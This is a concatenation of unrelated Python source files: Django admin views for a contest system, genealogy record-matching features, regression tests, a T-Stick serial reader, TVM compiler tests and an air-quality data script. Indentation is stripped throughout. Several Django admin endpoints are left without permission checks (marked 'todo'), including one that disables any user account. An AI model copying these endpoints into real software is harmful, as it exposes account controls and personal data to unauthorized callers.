file_path = f"/tmp/{file_name}.xlsx"
if not os.path.isfile(file_path):
return self.error("文件不存在")
with open(file_path, "rb") as f:
raw_data = f.read()
os.remove(file_path)
response = HttpResponse(raw_data)
response["Content-Disposition"] = f"attachment; filename={file_name}.xlsx"
response["Content-Type"] = "application/xlsx"
return response
@validate_serializer(GenerateUserSerializer)
def post(self, request):
"""
Generate User
"""
data = request.data
contest_id = data['contest_id']
con = Contest.objects.filter(pk=contest_id).values("id")
if not con.exists():
return self.error("此场竞赛不存在")
file_name = f"contest_{con[0]['id']}_UserList"
temp_file_path = f"/tmp/{file_name}.xlsx"
workbook = xlsxwriter.Workbook(temp_file_path)
worksheet = workbook.add_worksheet()
worksheet.write("A1", "UserID")
worksheet.write("B1", "Password")
worksheet.write("C1", "RealName")
user_list, len_password, prefix = [
], data['password_len'], data['prefix'] + rand_str(1, 'num')
for number in range(data["number"]):
raw_password = <PASSWORD>(<PASSWORD>)
user = User(
register_type=UserRegisterType.TEMP,
admin_type=AdminType.Student,
is_auth=True,
user_id=data['prefix'] + rand_str(8, "num"),
username=f"{prefix}{number}",
password=<PASSWORD>(<PASSWORD>))
user.raw_password = <PASSWORD>
user_list.append(user)
try:
with transaction.atomic():
up_list, cp_list, i = [], [], 1
for u in user_list:
u.save()
up_list.append(
UserProfile(
user_id=u.id,
real_name=u.username))
cp_list.append(
ContestPartner(
contest_id=contest_id,
user_id=u.id))
UserProfile.objects.bulk_create(up_list)
ContestPartner.objects.bulk_create(cp_list)
for user in user_list:
worksheet.write_string(i, 0, user.user_id)
worksheet.write_string(i, 1, user.raw_password)
worksheet.write_string(i, 2, user.username)
i += 1
workbook.close()
return self.success({"filename": file_name})
except IntegrityError as e:
return self.error(str(e))
class AddContestUsersAPI(APIView):
def post(self, request):
# 老师 管理员以上角色
data = request.data
contest_id = data.get("contest_id")
user_id_list = data.get("user_id_list")
if not all((contest_id, user_id_list,)):
return self.error("请确保信息完整")
try:
contest = Contest.objects.only("s_number").get(pk=contest_id)
except Contest.DoesNotExist:
return self.error("用户或竞赛不存在")
curr_num = contest.s_number
cp_list, count = list(), 0
[cp_list.append(ContestPartner(user_id=uid, contest_id=contest_id))
for uid in user_id_list]
for cp in cp_list:
try:
with transaction.atomic():
cp.save()
count += 1
except IntegrityError:
pass
contest.s_number = curr_num + count
contest.save(update_fields=('s_number',))
return self.success(count)
class FilterConditionAPI(APIView):
# todo 添加权限限制
def get(self, request):
level = request.GET.get("level")
major = request.GET.get("major")
class_id = request.GET.get("class_id")
department = request.GET.get("department")
if not any((level, major, class_id, department,)):
key = "department"
info = Grade.objects.all()
elif not any((level, major, class_id,)) and department:
key = "level"
info = Grade.objects.filter(department=department)
elif not any((major, class_id,)) and all((department, level,)):
key = "major"
info = Grade.objects.filter(
level=level, department=department)
else:
key = "class_id"
info = Grade.objects.filter(
level=level, major=major, department=department)
info = info.values(key).distinct()
return self.success(data=[i for i in info])
class UserDepartmentsAPI(APIView):
# todo 权限检测
def get(self, request):
deps = OwnInfo.objects.all().values("department")
return self.success(UserDepartmentsSerializer(deps, many=True).data)
class UserCheckUserIdAPI(APIView):
# todo 权限检测
def post(self, request):
data = request.data
user_id = data.get("user_id")
result = {
"exists": False,
"info": None
}
if user_id:
user = User.objects.filter(
user_id=user_id).values("userprofile__real_name")
if user.exists():
result["exists"] = True
result["info"] = user[0].get("userprofile__real_name")
return self.success(result)
class AddOneStudentToContestAPI(APIView):
def post(self, request):
# 给用户id 和姓名
# 如果西用户存在,返回所欲信息
# 如果不存在,创建用户,返回信息
data = request.data
user_id = data.get("user_id")
real_name = data.get("real_name")
val_list = UserAdminAPI.val_list
user = User.objects.filter(
user_id=user_id).select_related("userprofile").only(
*
val_list).values(
*
val_list)
if not user.exists():
u = User.objects.create(
user_id=user_id,
register_type=UserRegisterType.FACTORY)
up = UserProfile.objects.create(real_name=real_name, user=u)
u.set_password(<PASSWORD>)
u.save()
result = dict(
id=u.id,
user_id=u.user_id,
userprofile__real_name=real_name,
userprofile__avatar=up.avatar)
else:
result = UserAdminSerializer(user[0]).data
return self.success(data=result)
class UserTobeDisable(APIView):
# todo 检测权限
def put(self, request):
uid = request.data.get("id")
opera = request.data.get("opera")
if uid:
u = User.objects.filter(id=uid).update(is_disabled=opera)
else:
return self.error("修改失败")
return self.success(data=u)
class UserGradeListAPI(APIView):
def get(self, request):
fields = (
"id",
"level",
"major",
"department",
"class_id",
"edu_level",
"create_time",
)
keyword = request.GET.get("keyword")
list_grade = Grade.objects.filter()
if keyword:
list_grade = list_grade.filter(
Q(
major__contains=keyword) | Q(
department__contains=keyword) | Q(
level__contains=keyword) | Q(
edu_level__contains=keyword)).values(
*fields)
list_grade_stu_number = User.objects.filter(
grade__isnull=False).annotate(
student_number=Count("grade_id")).values_list(
'grade_id',
"student_number")
map_grade = {}
for item in list_grade_stu_number:
if map_grade.get(item[0]):
map_grade[item[0]] += item[1]
else:
map_grade.setdefault(item[0], item[1])
data = self.paginate_data(
request, list_grade, UserGradeListSerializers)
data['grades_stu_num'] = map_grade
return self.success(data)
class UserOfGradeListAPI(APIView):
def get(self, request):
grade_id = request.GET.get("grade_id")
val_list = (
"id",
"user_id",
"email",
"phone",
"grade_id",
"is_disabled",
"create_time",
"last_login",
"userprofile__class_id",
"userprofile__avatar",
"userprofile__level",
"userprofile__real_name",
"userprofile__department",
"userprofile__major",
)
users = User.objects.select_related("userprofile").filter(
grade_id=grade_id).values(*val_list)
data = self.paginate_data(request, users, UserAdminSerializer)
return self.success(data)
class UserOfGradeRankAPI(APIView):
def get_list_grade_id(self, level, major):
set_grade_id = Grade.objects.filter(
level=level, major=major).values_list(
"id", flat=True)
return set_grade_id
def get_user_rank(self, request, grade_list=None, real_name=""):
val_list = (
"user__user_id",
"user__username",
"avatar",
"submission_number",
"accepted_number",
"real_name",
"user_id",)
_filter = dict(user__grade_id__in=grade_list)
if real_name:
_filter['real_name__contains'] = real_name
list_rank = UserProfile.objects.filter(**_filter).select_related("user").values(
*
val_list).order_by(
"-accepted_number",
"submission_number")
return self.paginate_data(
request,
list_rank,
RankInfoSerializer)
def get(self, request):
level = request.GET.get("level")
major = request.GET.get("major")
real_name = request.GET.get("real_name")
set_grade_id = self.get_list_grade_id(level, major)
data = self.get_user_rank(request, set_grade_id, real_name)
return self.success(data)
class UserGradeOne(APIView):
def get(self, request):
grade_id = request.GET.get("grade_id")
fields = (
"level",
"major",
"department",
"edu_level",
"class_id",
)
set_res = Grade.objects.filter(pk=grade_id).values(*fields)
if not set_res.exists():
return self.success()
set_res = set_res[0]
return self.success(data=set_res)
class UserAdminOperationRecord(APIView):
def get(self, request):
offset = int(request.GET.get("offset", 0))
limit = int(request.GET.get("limit", 20))
query = """select ad.id, ad.u_type, ad.action, ad.action_time, ad.api, ad.location, up.real_name from
admin_op_record ad inner join user_profile up on up.user_id=ad.uid order by action_time desc limit %s, %s; """
list_record = AdminOperationRecord.objects.raw(query, params=[offset, limit + offset], translations="")
data = {
"total": AdminOperationRecord.objects.count(),
"results": AdminOperationRecordSerializers(list_record, many=True).data,
}
# res = ""
# res = self.paginate_data(request, list_record, AdminOperationRecordSerializers)
return self.success(data=data)
|
# -*- coding: utf-8 -*-
# This Python file uses the following encoding: utf-8
"""
Calculate SVM feature vector for various choises
Normally the selected routine is called as 'SVMfeatures'
"""
from matchUtils import *
from matchtext import matchtext
def personDefault(workP=None, matchP=None, conf=None, score=None, nodeScore=None,
famScore=None, cosScore=None, features=None, matchtxtLen=None):
"""
Optimized version of myselNoScore
"""
fList = []
if features is not None:
fList.append(features['givenName']['eq'])
fList.append(features['lastName']['eq'])
fList.append(features['name']['strSim'])
fList.append(features['birthYear']['eq'])
fList.append(features['birthYear']['neq'])
fList.append(features['birthYear']['sim'])
fList.append(features['birthDate']['eq'])
fList.append(features['birthDate']['neq'])
fList.append(features['birthDate']['sim'])
fList.append(features['birthPlace']['eq'])
fList.append(features['birthPlace']['neq'])
fList.append(features['birthPlace']['sim'])
fList.append(features['deathYear']['eq'])
fList.append(features['deathYear']['sim'])
fList.append(features['deathDate']['eq'])
fList.append(features['deathDate']['sim'])
fList.append(features['deathPlace']['sim'])
#fList.append(features['score'])
#fList.append(features['scoreNorm'])
fList.append(features['cosSim'])
fList.append(features['cosSimNorm'])
fList.append(features['NodeSim'])
fList.append(features['FamilySim'])
return [0.0 if v is None else v for v in fList]
#fList.append(features['givenName']['eq'])
#0.6 below is an arbitrary limit
if (workP['grpNameGiven'] and matchP['grpNameGiven'] and
(compName(workP['grpNameGiven'], matchP['grpNameGiven'])) >= 0.6):
fList.append(1)
else: fList.append(0)
#fList.append(features['lastName']['eq'])
if (workP['grpNameLast'] and matchP['grpNameLast'] and
(compName(workP['grpNameLast'], matchP['grpNameLast'])) >= 0.6):
fList.append(1)
else: fList.append(0)
#fList.append(features['name']['strSim'])
fList.append(strSim(workP['name'].replace('/',''), matchP['name'].replace('/','')))
#fList.append(features['birthYear']['eq'])
#fList.append(features['birthYear']['neq'])
try:
vals = compValAlla(workP['birth']['date'][0:4],matchP['birth']['date'][0:4])
fList.append(vals[0])
fList.append(vals[1])
except:
fList.append(None)
fList.append(None)
#fList.append(features['birthYear']['sim'])
try:
vals = dateSim(workP['birth']['date'][0:4], matchP['birth']['date'][0:4])
except:
vals = None
fList.append(vals)
#fList.append(features['birthDate']['eq'])
#fList.append(features['birthDate']['neq'])
try:
vals = compValAlla(workP['birth']['date'],matchP['birth']['date'])
fList.append(vals[0])
fList.append(vals[1])
except:
fList.append(None)
fList.append(None)
#fList.append(features['birthDate']['sim'])
try:
vals = dateSim(workP['birth']['date'], matchP['birth']['date'])
except:
vals = None
fList.append(vals)
#fList.append(features['birthPlace']['eq'])
#fList.append(features['birthPlace']['neq'])
try:
vals = compValAlla(workP['birth']['normPlaceUid'],matchP['birth']['normPlaceUid'])
fList.append(vals[0])
fList.append(vals[1])
except:
fList.append(None)
fList.append(None)
#fList.append(features['birthPlace']['sim'])
try:
vals = strSim(workP['birth']['place'], matchP['birth']['place'])
except:
vals = None
fList.append(vals)
#fList.append(features['deathYear']['eq'])
try:
vals = compValAlla(workP['death']['date'][0:4],matchP['death']['date'][0:4])
fList.append(vals[0])
except:
fList.append(None)
#fList.append(features['deathYear']['sim'])
try:
vals = dateSim(workP['death']['date'][0:4], matchP['death']['date'][0:4])
except:
vals = None
fList.append(vals)
#fList.append(features['deathDate']['eq'])
try:
vals = compValAlla(workP['death']['date'],matchP['death']['date'])
fList.append(vals[0])
except:
fList.append(None)
#fList.append(features['deathDate']['sim'])
try:
vals = dateSim(workP['death']['date'], matchP['death']['date'])
except:
vals = None
fList.append(vals)
#fList.append(features['deathPlace']['sim'])
try:
vals = strSim(workP['death']['place'], matchP['death']['place'])
except:
vals = None
fList.append(vals)
#fList.append(features['cosSim'])
fList.append(cosScore)
#Length normalization: maxLen = 54
#fList.append(features['cosSimNorm'])
#EVT use len(matchtxt) or cosSimNorm as parameter??
#mt_tmp = matchtext()
#matchtxt = mt_tmp.matchtextPerson(workP, conf['persons'], conf['families'])
#fList.append(cosScore*(len(matchtxt.split())/54.0))
fList.append(cosScore*(matchtxtLen/54.0))
#fList.append(features['NodeSim'])
fList.append(nodeScore)
#fList.append(features['FamilySim'])
fList.append(famScore)
return [0.0 if v is None else v for v in fList]
##########################FAMILY#################
import logging #??
import common
from collections import defaultdict
def famBaseline(work, match, config):
#def svmFamily(work, match, config):
# work = config['families'].find_one({'refId': wid})
# match = config['match_families'].find_one({'refId': mid})
if not work or not match: return None
fmatch = config['fam_matches'].find_one({'workid': work['_id'], 'matchid': match['_id']})
#logging.debug('fmatch=%s', fmatch)
if not fmatch:
from utils import matchFam
fmatch = matchFam(work['_id'], match['_id'], config)
#logging.debug('fmatch=%s', fmatch)
features = []
#famSim
features.append(familySim(work, config['persons'], match, config['match_persons']))
#matchtext cos sim?
#green Parents 0, 0.5, 1
#yellow Parents 0, 0.5, 1
#red Parents 0, 0.5, 1
green = 0.0
yellow = 0.0
red = 0.0
for partner in ('husb','wife'):
try:
if fmatch[partner]['status'] in common.statOK: green += 0.5
elif fmatch[partner]['status'] in common.statManuell: yellow += 0.5
elif fmatch[partner]['status'] in common.statEjOK: red += 0.5
except: pass
features.append(green)
features.append(yellow)
features.append(red)
#green children 0 - 1
#yellow children 0 - 1
#red children 0 - 1
#white children 0 - 1
chstat = defaultdict(int)
antch = 0.0
for ch in fmatch['children']:
antch += 1.0
if ch['status'] in common.statOK: chstat['green'] += 1
elif ch['status'] in common.statManuell: chstat['yellow'] += 1
elif ch['status'] in common.statEjOK: chstat['red'] += 1
elif ch['status'] == "": chstat['white'] += 1
#logging.debug('in loop %s %s', ch['status'], chstat)
#logging.debug('fmatch=%s, antch=%s, chstat=%s', len(fmatch['children']), antch, chstat)
if antch==0: antch=1.0 #avoid division by 0
features.append(float(chstat['green'])/antch)
features.append(float(chstat['yellow'])/antch)
features.append(float(chstat['red'])/antch)
features.append(float(chstat['white'])/antch)
#marriage datesim
try: features.append(dateSim(work['marriage']['date'], match['marriage']['date']))
except: features.append(dateSim(None, None))
#marriage placesim
try: features.append(strSim(work['marriage']['place'], match['marriage']['place']))
except: features.append(strSim(None, None))
#cos-sim fammatchtext - kanske inte - barn ofta olika!
return [0.0 if v is None else v for v in features]
#return cleanupVect(features)
def famExtended(work, match, config):
features = famBaseline(work, match, config)
#husb, wife: childfam status none,red,yellow,green
green = 0.0
yellow = 0.0
red = 0.0
for partner in ('husb', 'wife'):
#find family where partner child
try:
#work
#wife.workid ger ObjectId: work[partner]['workid']
#db.families.findOne({'children': ObjectId("58b456c77077b94d64947818")})
tFam = config['families'].find_one({'children': work[partner]['workid']})
workFamId = tFam['_id']
#samma för match
tFam = config['match_families'].find_one({'children': work[partner]['matchid']})
matchFamId = tFam['_id']
#get status for fam-match
fmatch = config['fam_matches'].find_one({'workid': workFamId, 'matchid': matchFamId})
if fmatch['status'] in common.statOK: green += 0.5
elif fmatch['status'] in common.statManuell: yellow += 0.5
elif fmatch['status'] in common.statEjOK: red += 0.5
except:
pass
features.append(green)
features.append(yellow)
features.append(red)
#for children use status families where they are husb,wife
#average over childstatus - white,green,yellow,red
return [0.0 if v is None else v for v in features]
|
<reponame>ShubhamDiwan/elm<gh_stars>10-100
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_regression
----------------------------------
Datasets used were from sklearn.datasets
import numpy as np
from sklearn.datasets import load_boston, load_diabetes
data = load_boston()
data = np.hstack((data["target"].reshape(-1, 1), data["data"]))
np.savetxt("boston.data", data)
data = load_diabetes()
data = np.hstack((data["target"].reshape(-1, 1), data["data"]))
np.savetxt("diabetes.data", data)
"""
import elm
def test_elmk_boston():
# load dataset
data = elm.read("tests/data/boston.data")
# create a regressor
elmk = elm.ELMKernel()
try:
# search for best parameter for this dataset
# elmk.search_param(data, cv="kfold", of="rmse")
# split data in training and testing sets
tr_set, te_set = elm.split_sets(data, training_percent=.8, perm=True)
#train and test
tr_result = elmk.train(tr_set)
te_result = elmk.test(te_set)
except:
ERROR = 1
else:
ERROR = 0
assert (ERROR == 0)
# te_result.get_rmse()
# assert (te_result.get_rmse() <= 20)
def test_elmk_diabetes():
# load dataset
data = elm.read("tests/data/diabetes.data")
# create a regressor
elmk = elm.ELMKernel()
try:
# search for best parameter for this dataset
# elmk.search_param(data, cv="kfold", of="rmse")
# split data in training and testing sets
tr_set, te_set = elm.split_sets(data, training_percent=.8, perm=True)
#train and test
tr_result = elmk.train(tr_set)
te_result = elmk.test(te_set)
except:
ERROR = 1
else:
ERROR = 0
assert (ERROR == 0)
# assert (te_result.get_rmse() <= 70)
def test_elmr_boston():
# load dataset
data = elm.read("tests/data/boston.data")
# create a regressor
elmr = elm.ELMRandom()
try:
# search for best parameter for this dataset
# elmr.search_param(data, cv="kfold", of="rmse")
# split data in training and testing sets
tr_set, te_set = elm.split_sets(data, training_percent=.8, perm=True)
#train and test
tr_result = elmr.train(tr_set)
te_result = elmr.test(te_set)
except:
ERROR = 1
else:
ERROR = 0
assert (ERROR == 0)
# assert (te_result.get_rmse() <= 20)
def test_elmr_diabetes():
# load dataset
data = elm.read("tests/data/diabetes.data")
# create a regressor
elmr = elm.ELMRandom()
try:
# search for best parameter for this dataset
# elmr.search_param(data, cv="kfold", of="rmse")
# split data in training and testing sets
tr_set, te_set = elm.split_sets(data, training_percent=.8, perm=True)
#train and test
tr_result = elmr.train(tr_set)
te_result = elmr.test(te_set)
except:
ERROR = 1
else:
ERROR = 0
assert (ERROR == 0)
# assert (te_result.get_rmse() <= 70)
|
<gh_stars>1-10
# Python code to convert T-Stick serial port messages to OSC
# Author: <NAME> (IDMIL, 2019)
import sys
import serial
import collections
import struct
from apscheduler.schedulers.background import BackgroundScheduler
from bitstring import BitArray
import argparse
# parse argument to set OSC to send/receive T-Stick data
parser = argparse.ArgumentParser(
description='Convert T-Stick serial port messages into OSC messages.',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("--serialport", "-s", default="/dev/ttyUSB0",
metavar='', help="The T-Stick's serial port")
args = parser.parse_args()
# Opening T-Stick serial port
tstick = serial.Serial(args.serialport, 115200, dsrdtr=1)
# checking system byteorder
byteorder = sys.byteorder
# creating global variable to define T-Stick mapping
tstick_id = 0
def resend(address, *args):
tstick.write(args)
def heartbeat():
tstick.write('s'.encode('utf-8'))
def receive_serial():
""" Receive T-Stick serial data and make it available
as "serial_data" variable. The data is namedtuple.
"""
flag = False
msg = []
while True:
# byte = int.from_bytes(tstick.read(), sys.byteorder) # python 3.2+
byte = tstick.read()
if sys.byteorder is 'little':
byte = struct.unpack("<B", tstick.read())
else:
byte = struct.unpack(">B", tstick.read())
if not flag:
if byte == 100:
information = get_tstick_id(*msg)
if(tstick_id == 173):
serial_data = sort_and_send_173(*msg)
elif(tstick_id == 10 or
tstick_id == 12 or
tstick_id == 24 or
tstick_id == 171):
serial_data = sort_and_send_2G(*msg)
elif(tstick_id == 15):
serial_data = sort_and_send_2GX(*msg)
msg.clear()
elif byte == 101:
flag = True
else:
msg.append(byte)
else:
msg.append(byte)
flag = False
def bit_conversion(byte1, byte2):
return (byte1 * 256) + byte2
def bit_ext_conversion(byte1, byte2):
bin_or = (byte1 * 256) | byte2
return bin_or - (65535 * (bin_or > 32767))
def get_tstick_id(*msg):
named_return = collections.namedtuple(
'tstick_information', 'tstick_id firmware info_list')
if msg[0] == 0:
if len(msg) < 3:
return 0
global tstick_id
tstick_id = bit_conversion(msg[1], msg[2])
firmware = bit_conversion(msg[3], msg[4])
info_list = [tstick_id, firmware]
if len(msg) > 5:
for i in msg[5:]:
info_list.append(i)
return named_return(tstick_id, firmware, info_list)
def sort_and_send_173(*msg):
""" Route T-Stick messages for T-Stick #173. """
if msg[0] == 0:
return 0
elif msg[0] == 1:
named_return = collections.namedtuple('tstick_sensor', 'rawcapsense')
rawcapsense = msg[1:]
return named_return(rawcapsense)
elif msg[0] == 2:
named_return = collections.namedtuple(
'tstick_sensor', 'rawaccel rawgyro rawpressure rawpiezo')
accel_x = bit_ext_conversion(msg[1], msg[2])
accel_y = bit_ext_conversion(msg[3], msg[4])
accel_z = bit_ext_conversion(msg[5], msg[6])
gyro_x = bit_ext_conversion(msg[7], msg[8])
gyro_y = bit_ext_conversion(msg[9], msg[10])
gyro_z = bit_ext_conversion(msg[11], msg[12])
pressure = bit_ext_conversion(msg[13], msg[14])
piezo = bit_ext_conversion(msg[15], msg[16])
return named_return(
[accel_x, accel_y, accel_z],
[gyro_x, gyro_y, gyro_z],
pressure,
piezo)
elif msg[0] == 3:
named_return = collections.namedtuple('tstick_sensor', 'rawmag')
mag_x = bit_ext_conversion(msg[1], msg[2])
mag_y = bit_ext_conversion(msg[3], msg[4])
mag_z = bit_ext_conversion(msg[5], msg[6])
return named_return([mag_x, mag_y, mag_z])
elif msg[0] == 4:
return 0
def sort_and_send_2G(*msg):
""" Route T-Stick messages for T-Stick 2G series: 010, 012, 024, 171. """
if msg[0] == 0:
return 0
elif msg[0] == 1:
named_return = collections.namedtuple('tstick_sensor', 'rawcapsense')
rawcapsense = msg[1:]
return named_return(rawcapsense)
elif msg[0] == 2:
named_return = collections.namedtuple('tstick_sensor', 'rawjab')
rawjab = msg[1:]
return named_return(rawjab)
elif msg[0] == 3:
named_return = collections.namedtuple('tstick_sensor', 'rawtap')
rawtap = msg[1:]
return named_return(rawtap)
elif msg[0] == 4:
named_return = collections.namedtuple(
'tstick_sensor', 'rawaccel rawpressure rawpiezo')
accel_x = bit_conversion(msg[1], msg[2])
accel_y = bit_conversion(msg[3], msg[4])
accel_z = bit_conversion(msg[5], msg[6])
pressure = bit_conversion(msg[7], msg[8])
piezo = bit_conversion(msg[9], msg[10])
return named_return([accel_x, accel_y, accel_z], pressure, piezo)
def sort_and_send_2GX(*msg):
""" Route T-Stick messages for T-Stick #015. """
if msg[0] == 0:
return 0
elif msg[0] == 1:
named_return = collections.namedtuple('tstick_sensor', 'rawcapsense')
rawcapsense = msg[1:]
return named_return(rawcapsense)
# capsense_bits = cook_touch_soprano(*rawcapsense)
elif msg[0] == 2:
named_return = collections.namedtuple('tstick_sensor', 'rawjab')
rawjab = msg[1:]
return named_return(rawjab)
elif msg[0] == 3:
named_return = collections.namedtuple('tstick_sensor', 'rawtap')
rawtap = msg[1:]
return named_return(rawtap)
elif msg[0] == 4:
named_return = collections.namedtuple(
'tstick_sensor', 'rawaccel rawpressure rawpiezo rawairpressure rawrange rawldr1 rawldr2')
accel_x = bit_conversion(msg[1], msg[2])
accel_y = bit_conversion(msg[3], msg[4])
accel_z = bit_conversion(msg[5], msg[6])
pressure = bit_conversion(msg[7], msg[8])
piezo = bit_conversion(msg[9], msg[10])
airpressure = bit_conversion(msg[11], msg[12])
tstick_range = bit_conversion(msg[13], msg[14])
ldr1 = bit_conversion(msg[15], msg[16])
ldr2 = bit_conversion(msg[17], msg[18])
return named_return([accel_x, accel_y, accel_z], pressure, piezo, airpressure, tstick_range, ldr1, ldr2)
def cook_touch_soprano(*bytes):
byte_list = ""
for byte in bytes:
byte_list = byte_list + format(byte, '08b')
return list(byte_list)
def tstick_wakeup():
""" Setting heartbeat to run every second """
scheduler = BackgroundScheduler()
scheduler.add_job(heartbeat, 'interval', seconds=1)
scheduler.start()
if __name__ == '__main__':
tstick_wakeup()
receive_serial()
sys.exit()
|
<reponame>zhanghaohit/incubator-tvm
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from tvm import relay
from tvm.relay import transform
def run_combine_parallel(expr, min_num_branches=3):
mod = relay.Module.from_expr(expr)
mod = transform.CombineParallelDense(min_num_branches)(mod)
return mod["main"]
def run_opt_pass(expr, opt_pass):
assert isinstance(opt_pass, transform.Pass)
mod = relay.Module.from_expr(expr)
mod = opt_pass(mod)
return mod["main"]
def test_combine_parallel_dense():
"""Simple testcase. One dense cannot be combined due to shape mismatch"""
def before(x, w1, w2, w3, w4):
args = [x, w1, w2, w3, w4]
y1 = relay.nn.dense(x, w1)
y2 = relay.nn.dense(x, w2)
# y3 cannot be combined
y3 = relay.nn.dense(x, w3)
y4 = relay.nn.dense(x, w4)
y = relay.Tuple((y1, y2, y3, y4))
return relay.Function(args, y)
def expected(x, w1, w2, w3, w4):
# use a fixed order of args so alpha equal check can pass
args = [x, w1, w2, w3, w4]
x_stacked = relay.stack((x, x, x), axis=0)
w = relay.stack((w1, w2, w4), axis=0)
y = relay.nn.batch_matmul(x_stacked, w)
(y1, y2, y4) = relay.split(y, 3)
y1 = relay.squeeze(y1, [0])
y2 = relay.squeeze(y2, [0])
y4 = relay.squeeze(y4, [0])
# y3 cannot be combined
y3 = relay.nn.dense(x, w3)
y = relay.Tuple((y1, y2, y3, y4))
return relay.Function(args, y)
def check(i, j, k):
x = relay.var("x", shape=(i, k))
w1 = relay.var("w1", shape=(j, k))
w2 = relay.var("w2", shape=(j, k))
w3 = relay.var("w3", shape=(j + 1, k))
w4 = relay.var("w4", shape=(j, k))
y_before = before(x, w1, w2, w3, w4)
y = run_opt_pass(y_before,
transform.CombineParallelDense(min_num_branches=2))
y_expected = expected(x, w1, w2, w3, w4)
y_expected = run_opt_pass(y_expected, transform.InferType())
assert relay.analysis.alpha_equal(y, y_expected)
check(3, 5, 4)
check(100, 200, 300)
def test_combine_parallel_dense_biasadd():
"""Testcase of combining dense + 1d biasadd"""
def before(x, w1, w2, b1, b2):
args = [x, w1, w2, b1, b2]
y1 = relay.nn.dense(x, w1)
y2 = relay.nn.dense(x, w2)
y1 = relay.add(y1, b1)
y2 = relay.add(y2, b2)
y = relay.Tuple((y1, y2))
return relay.Function(args, y)
def expected(x, w1, w2, b1, b2, is_2d_bias):
args = [x, w1, w2, b1, b2]
x_stacked = relay.stack((x, x), axis=0)
w = relay.stack((w1, w2), axis=0)
y = relay.nn.batch_matmul(x_stacked, w)
if not is_2d_bias:
b1 = relay.expand_dims(b1, 0)
b2 = relay.expand_dims(b2, 0)
b = relay.stack((b1, b2), axis=0)
y = relay.add(y, b)
(y1, y2) = relay.split(y, 2)
y1 = relay.squeeze(y1, [0])
y2 = relay.squeeze(y2, [0])
y = relay.Tuple((y1, y2))
return relay.Function(args, y)
def check(i, j, k, is_2d_bias):
x = relay.var("x", shape=(i, k))
w1 = relay.var("w1", shape=(j, k))
w2 = relay.var("w2", shape=(j, k))
if is_2d_bias:
b1 = relay.var("b1", shape=(i, j))
b2 = relay.var("b2", shape=(i, j))
else:
b1 = relay.var("b1", shape=(j,))
b2 = relay.var("b2", shape=(j,))
y_before = before(x, w1, w2, b1, b2)
y = run_opt_pass(y_before,
transform.CombineParallelDense(min_num_branches=2))
y_expected = expected(x, w1, w2, b1, b2, is_2d_bias)
y_expected = run_opt_pass(y_expected, transform.InferType())
assert relay.analysis.alpha_equal(y, y_expected)
check(3, 5, 4, False)
check(100, 200, 300, False)
check(3, 5, 4, True)
check(100, 200, 300, True)
def test_combine_parallel_dense_biasadd_scale_reshape():
"""Testcase of combining dense + 1d biasadd + multiply with non-fused reshape"""
def before(x, w1, w2, b1, b2, scale1, scale2, newshape):
args = [x, w1, w2, b1, b2, scale1, scale2]
y1 = relay.nn.dense(x, w1)
y2 = relay.nn.dense(x, w2)
y1 = relay.add(y1, b1)
y2 = relay.add(y2, b2)
y1 = relay.multiply(y1, scale1)
y2 = relay.multiply(y2, scale2)
y1 = relay.reshape(y1, newshape=newshape)
y2 = relay.reshape(y2, newshape=newshape)
y = relay.Tuple((y1, y2))
return relay.Function(args, y)
def expected(x, w1, w2, b1, b2, scale1, scale2, newshape):
args = [x, w1, w2, b1, b2, scale1, scale2]
x_stacked = relay.stack((x, x), axis=0)
w = relay.stack((w1, w2), axis=0)
y = relay.nn.batch_matmul(x_stacked, w)
b1 = relay.expand_dims(b1, 0)
b2 = relay.expand_dims(b2, 0)
b = relay.stack((b1, b2), axis=0)
y = relay.add(y, b)
scale1 = relay.expand_dims(scale1, 0)
scale2 = relay.expand_dims(scale2, 0)
scale = relay.stack((scale1, scale2), axis=0)
y = relay.multiply(y, scale)
(y1, y2) = relay.split(y, 2)
y1 = relay.squeeze(y1, [0])
y2 = relay.squeeze(y2, [0])
y1 = relay.reshape(y1, newshape=newshape)
y2 = relay.reshape(y2, newshape=newshape)
y = relay.Tuple((y1, y2))
return relay.Function(args, y)
def check(i, j, k, scale1, scale2, newshape):
x = relay.var("x", shape=(i, k))
w1 = relay.var("w1", shape=(j, k))
w2 = relay.var("w2", shape=(j, k))
b1 = relay.var("b1", shape=(j,))
b2 = relay.var("b2", shape=(j,))
scale1 = relay.var("scale1", shape=(1,))
scale2 = relay.var("scale2", shape=(1,))
y_before = before(x, w1, w2, b1, b2, scale1, scale2, newshape)
y = run_opt_pass(y_before,
transform.CombineParallelDense(min_num_branches=2))
y_expected = expected(x, w1, w2, b1, b2, scale1, scale2, newshape)
y_expected = run_opt_pass(y_expected, transform.InferType())
assert relay.analysis.alpha_equal(y, y_expected)
check(3, 5, 4, 0.5, 0.25, (1, 1, 15))
check(100, 200, 300, 0.5, 0.25, (1, 1, 200))
if __name__ == "__main__":
test_combine_parallel_dense()
test_combine_parallel_dense_biasadd()
test_combine_parallel_dense_biasadd_scale_reshape()
|
<filename>WHI_2012_mass_concs_SP2_filter_GC.py<gh_stars>1-10
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import numpy as np
from matplotlib import dates
import os
import pickle
from datetime import datetime
from pprint import pprint
import sys
from datetime import timedelta
import calendar
import mysql.connector
#database connection
cnx = mysql.connector.connect(user='root', password='<PASSWORD>', host='localhost', database='black_carbon')
cursor = cnx.cursor()
max_display_conc = 1000
correction_factor_for_massdistr = 1.85#set to 1 and deal with each cluster separately 1.96 #corrects for only sampling part of the mass distr +- 5%
R = 8.3144621 # in m3*Pa/(K*mol)
#import WHI met data for STP corrections
WHI_pressures = []
with open('C:/Users/<NAME>/Documents/Data/WHI long term record/WHI station met and other data/whi__met_summer_2009-2012.txt', 'r') as f:
f.readline()
for line in f:
newline = line.split('\t')
date_PST = datetime.strptime(newline[0], '%d/%m/%Y %H:%M')
try:
pressure_mbar = float(newline[5])
pressure_Pa = pressure_mbar*100 #100Pa/mbar
WHI_pressures.append([date_PST,pressure_Pa])
except:
continue
